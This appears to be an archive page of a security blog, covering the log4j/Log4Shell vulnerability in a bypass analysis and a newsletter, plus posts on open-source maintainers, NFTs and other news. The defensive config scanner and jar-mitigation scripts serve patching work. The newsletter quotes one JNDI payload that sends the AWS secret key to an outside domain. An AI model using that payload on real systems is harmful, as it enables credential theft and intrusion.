Daniel Miessler's Blog, page 42

December 18, 2021

The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think


If you’re reading this you’re underslept and over-caffeinated due to log4j. Thank you for your service.

I have some good news.

I know a super-smart guy named d0nut who figured something out like 3 days ago that very few people know.

Once you have 2.15 applied—or the formatMsgNoLookups flag set to disable lookups—you actually need a non-default log4j2.properties configuration to still be vulnerable!

Read that again.

The bypasses of 2.15 and the NoLookups CLI change don’t affect people unless they have non-default logging configurations. From the Apache advisory:

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern.

(Apache Project Security Advisory)


“Certain non-default configurations”. I’ve never heard a sweeter set of syllables.

These lookup patterns can also be set in log4j2.xml or programmatically.

So you need to have changed your configs to include patterns like:

$${ctx:loginId}
${ctx
${event
${env

…etc, to be vulnerable to the bypasses of the 2.15 patch level or of the log4j2.formatMsgNoLookups / LOG4J_FORMAT_MSG_NO_LOOKUPS = true mitigation!

That’s huge! And Nate figured this out like 4 days ago!


Just to point out to those panicking about this right now: this is a very uncommon situation to be vulnerable from this CVE in a “readily exploitable from the internet” way.

Look for ${event:Message} or ${ctx:*} in your log4j2 properties or xml files

— d0nut (@d0nutptr) December 15, 2021
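As an added example that is not from the original post or from d0nut: a small Python scanner for the check described above, flagging ${ctx:...}, ${event:...} and ${env:...} lookups (in both the "${" and deferred "$${" spelling) in log4j2 properties and XML files. The sample configs inside it are constructed for this example, not taken from any real deployment.

```python
"""Scan log4j2 configuration files for the non-default Context Lookup patterns
(for example $${ctx:loginId} or ${event:Message}) that keep a deployment
exposed even after the 2.15.0 patch or the formatMsgNoLookups mitigation.

Added example, not code from the original post. Assumes plain
log4j2*.properties / log4j2*.xml files; the sample configs below are
constructed for this example.
"""
import re
import sys
from pathlib import Path
from typing import List, NamedTuple


class Finding(NamedTuple):
    path: str
    line_no: int
    lookup: str   # e.g. "ctx:loginId"
    context: str  # the offending config line, stripped


# Lookup prefixes named in the post and the tweet: ctx, event, env.
# "$${...}" (double dollar) is matched as well as "${...}": the "$$" spelling
# defers evaluation to log-event time, which is what lets attacker-controlled
# MDC / message data reach the lookup.
LOOKUP_RE = re.compile(r"\$\$?\{\s*(ctx|event|env)\s*(:[^}]*)?\}", re.IGNORECASE)

CONFIG_SUFFIXES = {".properties", ".xml", ".yaml", ".yml", ".json"}


def scan_text(text: str, path: str = "<inline>") -> List[Finding]:
    """Return every ctx/event/env lookup in a config body, skipping comment lines."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith(("#", "!", "<!--")):
            continue  # commented-out config is not live
        for m in LOOKUP_RE.finditer(line):
            lookup = m.group(1).lower() + (m.group(2) or "")
            findings.append(Finding(path, line_no, lookup, stripped))
    return findings


def scan_tree(root: Path) -> List[Finding]:
    """Scan every log4j2*.<suffix> file below root."""
    findings: List[Finding] = []
    for p in sorted(root.rglob("log4j2*")):
        if p.is_file() and p.suffix.lower() in CONFIG_SUFFIXES:
            findings.extend(scan_text(p.read_text(encoding="utf-8", errors="replace"), str(p)))
    return findings


# Constructed samples: a properties file and an XML file with a risky
# pattern, and one default-style pattern that should produce no findings.
SAMPLE_PROPERTIES = """\
# constructed log4j2.properties
appender.console.type = Console
appender.console.name = STDOUT
appender.console.layout.type = PatternLayout
appender.console.layout.pattern = %d{HH:mm:ss} [%t] %-5level user=$${ctx:loginId} %msg%n
rootLogger.level = info
"""

SAMPLE_XML = """\
<?xml version="1.0" encoding="UTF-8"?>
<!-- constructed log4j2.xml -->
<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p %c{1.} [%t] ${event:Message}%n"/>
    </Console>
  </Appenders>
</Configuration>
"""

DEFAULT_PATTERN = "appender.console.layout.pattern = %d{HH:mm:ss} [%t] %-5level %logger{36} - %msg%n\n"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(Path(sys.argv[1]))
    else:
        results = scan_text(SAMPLE_PROPERTIES, "sample.properties") + scan_text(SAMPLE_XML, "sample.xml")
    for f in results:
        print(f"{f.path}:{f.line_no}: ${{{f.lookup}}} in: {f.context}")
    if not results:
        print("no ctx/event/env lookups found")
```

Run it with a directory argument to walk a real tree; a hit only matters if the pattern is live in a layout that logs attacker-influenced MDC or message data, so review each finding in context.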

He mentioned to me multiple times this wasn’t as bad as people thought, but he wasn’t shouting from the rooftops so I didn’t listen well enough. Shame on me.

He also happens to have a strong meme game.


POV: you follow me pic.twitter.com/Xw33fmji1A

— d0nut (@d0nutptr) December 15, 2021
Summary

The first vuln was just as bad as everyone thinks it is. Or worse. It did not require this non-default logging configuration.

But if you are patched to 2.15, or mitigated with the NoLookup config, you are no longer vulnerable unless you ALSO have a logging config option set in your log4j2.properties file that re-enables them.

So, if you’re already patched to 2.15 and/or have the mitigation in place, and don’t have non-standard configs—which you should confirm—you might be able to sleep for a bit.

And of course of course—keep in mind that this all only pertains to vulnerabilities we know about today. And the internet moves fast.

Finally, d0nut is awesome and you should follow his work.

Notes

This also applies to the DoS that 2.17 addresses.

Thanks to Nate for the great find!
Published on December 18, 2021 11:09

December 13, 2021

News & Analysis | No. 311


SECURITY NEWS

The log4j (Log4Shell) Situation 

What Happened: A 0-day exploit was released for log4j—a Java-based logging utility that’s part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs. 

Impact: People are comparing this to Heartbleed, but it’s much worse in a number of ways. While Heartbleed affected all TLS implementations, and this one only affects systems that use log4j, this issue produces direct and immediate harm in the form of password/key extractions and shells.

This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

How it Works: The vulnerability is due to insecure “lookup” functionality within log4j that executes user-provided content as code, also known as RCE. So if you provide the input  `${env:PWD}`, it’ll write the PWD environment variable to the log. It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.

Example: Here’s an example from @dildog of extracting AWS Keys and listening for incoming requests. 

${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

What to Do: The best way to fix this is to find all your instances of log4j and patch them to 2.15+. If you can’t do that, there are a few possible mitigations:

Patching: Upgrade to version 2.15.0.

Mitigation: For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
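The find-then-patch-or-mitigate steps above, as an added Python example that is not from the newsletter or from Apache: it locates log4j-core jars under a directory, reports each one’s version and whether JndiLookup.class is still inside, and can write a copy with that class removed (the same effect as the zip -q -d command). It assumes the jar manifest carries an Implementation-Version header, as log4j-core jars do; the jars built by run_demo() are constructed stand-ins, not real log4j artifacts.

```python
"""Find log4j-core jars below a directory, report each one's version and whether
JndiLookup.class is still inside, and write a mitigated copy with that class
removed (the effect of the zip -q -d command quoted above).

Added example, not code from the newsletter. Assumes META-INF/MANIFEST.MF
carries an Implementation-Version header (log4j-core jars do), with the file
name as fallback. The jars built by run_demo() are constructed stand-ins.
"""
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JAR_NAME_RE = re.compile(r"log4j-core-(\d[\w.]*)\.jar$")


def version_tuple(v: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0): pre-release tag dropped."""
    return tuple(int(x) for x in v.split("-")[0].split(".") if x.isdigit())


def jar_version(jar: zipfile.ZipFile, path: Path) -> Optional[str]:
    try:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
        if m:
            return m.group(1)
    except KeyError:
        pass  # no manifest; fall back to the file name
    m = JAR_NAME_RE.search(path.name)
    return m.group(1) if m else None


def inspect_jar(path: Path) -> Dict[str, object]:
    """Version, JndiLookup presence, and whether the jar predates 2.15.0."""
    with zipfile.ZipFile(path) as jar:
        version = jar_version(jar, path)
        has_jndi = JNDI_LOOKUP in jar.namelist()
    below_2_15 = version is None or version_tuple(version) < (2, 15, 0)
    return {"path": str(path), "version": version,
            "has_jndi_lookup": has_jndi, "below_2_15": below_2_15}


def find_log4j_jars(root: Path) -> List[Path]:
    return sorted(p for p in root.rglob("log4j-core-*.jar") if p.is_file())


def strip_jndi_lookup(src: Path, dst: Path) -> bool:
    """Copy src to dst without JndiLookup.class; True if the class was present."""
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for info in zin.infolist():
            if info.filename == JNDI_LOOKUP:
                removed = True
                continue
            zout.writestr(info, zin.read(info.filename))  # keeps entry metadata
    return removed


def build_sample_jar(path: Path, version: str, with_jndi: bool) -> Path:
    """Constructed stand-in jar: a manifest plus an empty JndiLookup.class entry."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if with_jndi:
            jar.writestr(JNDI_LOOKUP, b"")
    return path


def run_demo() -> Dict[str, Dict[str, object]]:
    """Build a 2.14.1 and a 2.15.0 sample jar, mitigate the old one, report all."""
    root = Path(tempfile.mkdtemp(prefix="log4j-demo-"))
    old = build_sample_jar(root / "log4j-core-2.14.1.jar", "2.14.1", with_jndi=True)
    build_sample_jar(root / "log4j-core-2.15.0.jar", "2.15.0", with_jndi=True)
    strip_jndi_lookup(old, root / "log4j-core-2.14.1-mitigated.jar")
    return {p.name: inspect_jar(p) for p in find_log4j_jars(root)}


if __name__ == "__main__":
    for name, report in run_demo().items():
        print(name, report)
```

Jars shaded into other jars or WAR files are not walked here; for those, open the outer archive and apply inspect_jar to each embedded log4j-core entry.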
Note: WAF can help but won’t solve the problem. Most companies’ backend systems are already clogged with these malicious payloads, from multiple ingress points. We can’t fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input.

Detection: I know many companies using Semgrep to find vulnerable inclusions of user-provided data. Here’s an example Semgrep rule I got from Clint Gibler of R2C/TLDRSec.

Vaccination: This is definitely on the crazier side of things, but one clever approach is to use the vulnerability to mitigate the vulnerability. Specifically, it’s using the RCE functionality to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. (Code via Cybereason)

Other Considerations: As David Litchfield pointed out in a number of tweets, this isn’t just HTTP. Any service you have that takes input, including SMTP, IMAP, etc., are all additional attack vectors. Also consider second and N-level order processing of content on the backend as part of batch processes and other types of automation.

Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:

The project is maintained by very few people in their spare time for no money, and
If the project had a major issue it would disrupt the entire internet

We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint.

This is not their fault. They’re heroes for keeping the lights on. It’s our fault because we know how bad the situation is and we just YOLO through life as if we didn’t. The result is that we get to learn about internet-stopping vulnerabilities from the Minecraft community.



The FBI says a ransomware gang out of Cuba has been launching ransomware attacks against US critical infrastructure. They’ve released IoCs to help others find attacks from the group. More

The FTC says Americans lost $148 million to gift card scams in 2021. More

Attackers are using the log4j vulnerability to install malware, including cryptominers and Mirai and Muhstik botnet clients. More

QNAP says there’s new cryptominer malware targeting vulnerable QNAP NAS devices. More

CIA Director William Burns said on Monday that the CIA “has a number of different projects focused on cryptocurrency”. He went on to say, “My predecessor had started this, but had set in motion a number of different projects focused on cryptocurrency and trying to look at second and third-order consequences as well and helping with our colleagues in other parts of the U.S. government to provide solid intelligence on what we’re seeing as well.” More

Incidents: Volvo says attackers have stolen research and development information after hacking some of its servers. More
Marriot has suffered another data breach affecting 5.2 million guests. More

Vulnerabilities: log4j Critical RCE | Critical | RCE More
Sonicwall VPN Bugs in SMA 100-series Devices | Critical | RCE More
4 WordPress Plugins | Critical | 1.6 Million Sites Affected | More
Mozilla Firefox and Thunderbird | High More

Companies: Incode raises $220 million to do identity verification and authentication. More
TECHNOLOGY NEWS

DeepMind has revealed a new 280 billion parameter language model called Gopher. More

Italy has fined Amazon $1.3 billion for abusing its market position. More

Over 200 US newspapers have filed suit against Facebook and Google for monopolizing digital ad revenue—and by extension—online news. More

Meta has released Horizon Worlds, its social virtual reality space, to the world after more than a year in private testing mode. The platform functions much like Roblox in that you can create your own games within the base game. You currently can’t make money from your own games, but you can enter creator competitions and win money that way. More

Sports streaming is starting to intersect with sports betting, and Disney is deep into it. It’s the combination of watching sports with your friends and betting at the same time. More

People have spent $27 billion on NFTs in 2021 so far. Cryptopunks are the most popular collection with $3 billion in sales. More


HUMAN NEWS

Evergrande is a massive real estate company in China with over 200,000 employees, and it has defaulted on over $300 billion in outstanding liabilities. Beijing has intervened to prevent a collapse of the company. More

A new paper in Nature finds that exercise plasma boosts memory and dampens brain inflammation in mice. Interestingly, it shows that the plasma can be transferred to other mice, where they see the benefits as well. More

New research shows that Covid attacks fat tissue, which could be why obese people have been at higher risk of severe illness and death. More

Germany reported 70,000 new Covid infections last Wednesday, along with 534 deaths. These are the highest numbers in the country since February. More

60% of Republicans are confident in doctors’ advice, down from 73% in 2010. More


CONTENT, IDEAS & ANALYSIS

The Vigilant — We should have a new internet group called The Vigilant—a group of open-source code maintainers that steward and protect our top 1000 open-source applications. Read the Blog


NOTES

I was sad to hear that Anne Rice has died. She was 80. More than vampires, she gave me a love for New Orleans. So much so that when I visited it, it seemed somewhat familiar. She’ll be missed. More

I’m really looking forward to taking some time off soon around the holidays. I have a good amount of content that’s around 60-80% done, and I want to get it all over the line by January 1st. 

Thanks to Caleb Sima for input into my log4j analysis above.


DISCOVERY  

Ben Evans put out the latest version of his annual presentation on technology trends, and it’s remarkably good as usual. Covers the rebranding of Web 1, 2, and 3, Crypto, VR/AR, NFTs, and so much more. More

Ryan Holiday’s 9 Rules for a better life. More

A Semgrep rule for detecting insecure log4j logging. More

“This week the internet has learned—once again—that asset management is the center of security. It’s hard to patch what you can’t find.” — Daniel Miessler

“The most consequential figures in the tech world are half guys like steve jobs and bill gates and half some guy named Ronald who maintains a Unix tool called ‘runk’ which stands for Ronald’s Universal Number Kounter and handles all math for every machine on earth.” — Druthers Haver

StopLyingCloud — An honest AWS service health dashboard. More

Amazon Brand Detector — A Chrome extension for detecting which products on Amazon are Amazon-owned. More

TimeandDate — A tool for seeing where planets are visible in the night sky where you live. More

Diagrams — Draw cloud system architecture diagrams using Python code. More

Log4Shell Recon and Post-Exploitation Network Detection — A collection of detection rules and IOCs by NCC. More | by NCC Research

Log4jAttackSurface — A Curated List of Companies and Technologies Affected by Log4Shell More | by YfryTcshsGD

Border Collie — Uses Semgrep and watchdog to detect reverse shells in your environment. More


RECOMMENDATIONS

Many people in tech have been working tirelessly since Thursday on Log4Shell. If you have any authority or influence to help them at work, make sure they get some public love within the organization, along with some extra time off. 


APHORISMS

“We don’t rise to the level of our goals. We fall to the level of our systems.”

James Clear
Published on December 13, 2021 07:00

December 12, 2021

The Vigilant


We should have a new internet group called The Vigilant—a group of open-source code maintainers that steward and protect our top 1000 open-source applications.

Here’s how it could work.

Step 1: A group of internet technology and security leaders are elected and put into place. They are the oversight board of around 25 people who will vet whether someone can become part of The Vigilant based on reviewing resumes, commit history, etc.

Step 2: The oversight board then finds the top 1000 open source applications.

Step 3: The oversight board selects the first Vigilant members from people who have been maintaining those codebases for years.

Step 4: The oversight board, and the first Vigilant, go on a marketing tour to raise money from multiple sources—most importantly the MANGA companies and the government—for an annual budget of tens (or hundreds) of millions of dollars for critical infrastructure safety.

Step 5: That money is then paid out to The Vigilant as supplemental income for securely maintaining the code that runs the internet.

Step 6: The oversight board will also create and distribute elite-level swag for The Vigilant, including The Vigilant Coin, making it very respectable to be part of this group. And once you’re part of it, you always are.

TL;DR: We create an organization that raises our internet maintainer heroes to the status they deserve and provides funding to actually pay them something for their invaluable work.

Published on December 12, 2021 20:31

December 6, 2021

News & Analysis | No. 310

This is UL Member Content
Published on December 06, 2021 07:44

December 5, 2021

NFTs Are Digital Signaling


The best way to create, predict, or validate future tech is to consider how it addresses a fundamental human need. We can see this in previous technology jumps.

Blogging allowed people to be heard
The iPhone made people powerful through access to information and their network
Facebook allowed people first to stay in contact, and then to influence others
Gaming and the metaverse allow people to reinvent themselves as someone more powerful and attractive

One fundamental human need is to signal our desirability to others. Here’s a good capture of signaling from Spent, my favorite book on the topic.

Many products are signals first and material objects second. Our vast social primate brains evolved to pursue one central goal: to look good in the eyes of others. Buying impressive products in a money-based economy is just the most recent way to fulfill that goal.

Geoffrey Miller, Spent



When you think about NFTs—and really any other technology that you’re contemplating the future of—don’t think about the tech itself. Think about what fundamental need it fills.

NFTs are digital signaling. They will allow people to efficiently and scalably display their value to competitors and mates.

In this way, NFTs are directly linked to power and sex, which humans care a lot about.

Think about the use cases you’ve heard of.

Art collections
One of a kind items
Exclusive sets of items
Special in-game gear
Unique skins for characters
Etc

They’re all the same. They’re ways of conveying how special you are. And I ask you, is there anything more important to humans than displaying how special they are?

There are, actually. Two things are more fundamental: Survival and Reproduction. But it turns out that appearing elite and special to others helps you with both.

This will use AR in meatspace, and native displays within VR/Metaverse.

So with the combination of AR/VR/Metaverse we’re about to see the digitalization of signaling at scale.

When you look at someone in meatspace you’ll see indicators on their clothing, or above their heads, that indicate that their luxury items are authentic, along with their freshness (season) and cost of purchase.
You’ll be able to not only see that the item is authentic, but that it’s one of N small number. Think: sneakers, purses, watches, cars.
Displays can also indicate that items were completely bespoke pieces, created by the artist/designer, along with an authenticated signature of that creator.

The tech platforms will handle all the validation of the item itself, its true ownership by the wearer, the fact that the item in question is the one they’re wearing, and that the particular signature being displayed actually came from the original artist.

Trillions?

Think about the size of the luxury goods market. Now think about how many billions are lost to the fake luxury goods market.

NFTs will help people signal their value in a way that is difficult or impossible to forge, which will exponentially raise the effectiveness of that signaling—and the markets that enable it.

Summary

A bet against NFTs is a bet against signaling. A bet against signaling is a bet against human nature. A bet against human nature is a bad bet. A bet against NFTs is a bad bet.

Notes

My friend Joel Parish points out that you don’t actually need Web3 for this, which I totally agree with. But it’ll likely be done first on Web3 just because the ideas are rising to prominence together.
Published on December 05, 2021 09:37

November 29, 2021

News & Analysis | No. 309


[ We’ve extended the Black Friday offer for one additional day due to Cyber Monday. You have until the end of today to use this link to get $20 off UL Membership! ]

SECURITY NEWS

CISA has released Capacity Enhancement Guides for improving mobile device security for both consumers and organizations. It’s a collection of guidance for topics such as countering phishing, securing browsers, implementing strong auth, and others. More

France was about to buy Pegasus from NSO Group, but with news that the group targeted French President Macron, and the US ban on the company, the deal is at risk. More

Apple is also suing NSO Group, citing the use of the company’s tool by oppressive regimes to spy on innocent victims. More

In related news, Israel just announced that they’re banning the export of hacking and surveillance tools to 65 new countries. This supposedly brings the allow list down to 37 countries. More

Ross Bevington, a security researcher at Microsoft, says he looked at 25 million SSH brute force attacks across Microsoft’s sensor network and found that 77% of attempts were between 1 and 7 characters. Guesses over 10 characters were only seen in 6% of cases. More

Apple is going to start notifying users if they’re being targeted by state-sponsored actors. Targeted users will get a notification in their AppleID account, as well as an email and text. More

Palo Alto’s Unit 42 used a honeypot of 320 systems to detect attacks against internet-facing misconfigurations in daemons like SSH, RDP, and Postgres. They said 80% of the systems were compromised within a week, and some were hit within minutes. More | Report

David Schütz was awarded $10,000 by Google for finding vulnerabilities in Google Cloud Platform. More

Ukraine is pushing to upgrade its navy due to increased concern around Russian aggression. More

Incidents: GoDaddy reported an incident due to a flaw in a Managed WordPress installation. More
A new piece of malware called ‘Tardigrade’ is targeting biomanufacturing facilities. More

Vulnerabilities: vSphere Web Client | 7.5 More
Insulet OmniPod Insulin Management System | Allows for a replay attack that can inject insulin. More

Companies: Shield-IoT raises $7.4 million to do IoT security. More
Resilience raises $80 million in their Series C to do Cyber Insurance. More
TECHNOLOGY NEWS

Samsung is building a $17 billion chip factory in Texas, meaning more of the world’s chips will be made in America. More

Android users are evidently about to have a better text reactions experience when talking to iPhone users. Previously, reactions would come in out of order and generally looking wonky, and there’s an update rolling out now that will make them behave more like native Android reactions. More

Tile is being acquired by Life360, a location tracking company. More

Companies: HP reported $17 billion in revenue, up 9% over last year. More
HUMAN NEWS

Scientists are rushing to figure out how much current vaccines defend against COVID’s new Omicron variant. Meanwhile, Moderna says they could have an updated vaccine early in 2022. More

South Africa is complaining that they did the right thing by alerting the world to Omicron, but that they’re now being punished for it. Fair point, it seems. This is a good way to encourage countries to stay quiet in the future so they’re not the one listed as the source. More

California wants to delay the teaching of Algebra until 9th grade across the entire state. A lot of people are upset about this, including me. Progressives need to learn that you can’t reduce the gap between the top and bottom by lowering the bottom. Students with education-focused parents (largely immigrants) will still learn advanced math early and they’ll still get into the best schools and get the best jobs. This kind of policy just pulls everyone else further behind them. More

If you were waiting for a true sign of inflation, most items at the Dollar Tree will now cost $1.25. More


CONTENT, IDEAS & ANALYSIS

The Unsupervised Learning Daily Routine — I finally completed my daily routine writeup for the UL community. It’s not just the list of steps, but also includes annotations for why I included each item and the research behind it. It’s a living document that I’ll continue to tweak, and we’ll be able to track the changes over time in Github. More


NOTES

I’ve been an advisor for a startup called Opera Event for around 5 years, and my buddy Andrew who works there is heading out to DCentral Miami this week. Opera Event is a community-focused technology platform that helps communities, guilds, and DAOs take control of their user data, incentives, and currencies. If you work at OpenSea or any NFT/Web 3.0-focused company, or know someone who does, hit him up at andrew@operaevent.co to meet up there!

I’m somehow reading like 7 books right now. Not bragging. It’s sloppy and I need to clean it up. Basically need to push through or abandon a few.

I just started Assassin’s Apprentice, and I’m really enjoying the spin-up. Feels like an origin story with potential!

UL had a great bookclub today, and the book absolutely blew us away. It was way better than I thought it would be. The book was The Design of Everyday Things. This book is going into my Read Frequently list for sure.

I’m working on tons of content for the site right now, some general and some for members. The list includes a new Mental Models piece, which I’m really excited about.


DISCOVERY  

COVID Deaths by Vaccination Status — A brilliant presentation of the data around this topic. Spoiler: In the US, people vaccinated with Moderna are around 14 times less likely to die of COVID than someone who’s not vaccinated. Note, this is before boosters, which will widen that gap significantly. More

Another meta-analysis of the impact of Vitamin D on COVID infection has found that, “The limited currently available data suggest that sufficient Vitamin D level in serum is associated with a significantly decreased risk of COVID-19 infection”. More

The Verge reviewed the new Generation 3 of the Oura Ring. Big takeaways: positive, with lots of features are still coming, and it now requires a subscription. More

The Age of the Creative Minority More

Bugcrowd is hiring a Technical Project Manager. More

Don’t Soften Feedback More

Hardening your SSH Config File More

Practical Security Recommendations for Startups With Limited Budgets More

Maderas’ favorite OSINT resources. More

CVE Trends — A wonderful way to monitor trending CVEs on Twitter, written by Simon J. Bell. More

SSH-Audit — Audit your client and server SSH configs. More | by jtesta

Cracken — A smart-wordlist generator. More | by Shmuelamar


RECOMMENDATIONS

I’ve been studying physical and cognitive health for the last few years—with a special focus on longevity and happiness. After reading a couple dozen books on everything from diet, exercise, fitness, meditation, etc., there is one unified theme that stands out to me: making your body uncomfortable.

Think about that. The thing that running, lifting weights, ice baths, saunas, and fasting all have in common is that they produce health and happiness by convincing the body that life is still difficult, i.e., that life is still happening.

So my recommendation to you is to think about struggle as an umbrella concept for health and happiness: In short, make sure you are challenging your body in some way on a regular basis.


APHORISMS

“Find out who you are and do it on purpose.”

Dolly Parton
Published on November 29, 2021 07:02

November 26, 2021

The Unsupervised Learning Daily Routine

This is UL Member Content
Published on November 26, 2021 17:55

November 25, 2021

A Note to the UL Community on Thanksgiving

This Is UL Member Content
Published on November 25, 2021 01:46

November 22, 2021

News & Analysis | No. 308

This Content Is For Paying Members
Published on November 22, 2021 12:19

November 21, 2021

The Rittenhouse Trial


I think the public and the media are conflating two things here:

Should it be legal to walk around in public (especially during civil unrest) with an AR-15?
Was Rittenhouse defending himself when he killed those people?

It was clear to me from watching the video of the shootings that it was self-defense.

Other guys backed off when he pointed the weapon at them from his back, and he didn’t fire. He only fired at the ones that looked like they were going to attack him.

But would any of this have happened if he didn’t come to the site of a protest, from out of state, with an assault rifle? Probably not. But again, because it’s actually legal to do that right now, we have to remove that component from the conversation.

That’s why I think he was legally defending himself at that moment. And the jury agreed. 

Published on November 21, 2021 19:40
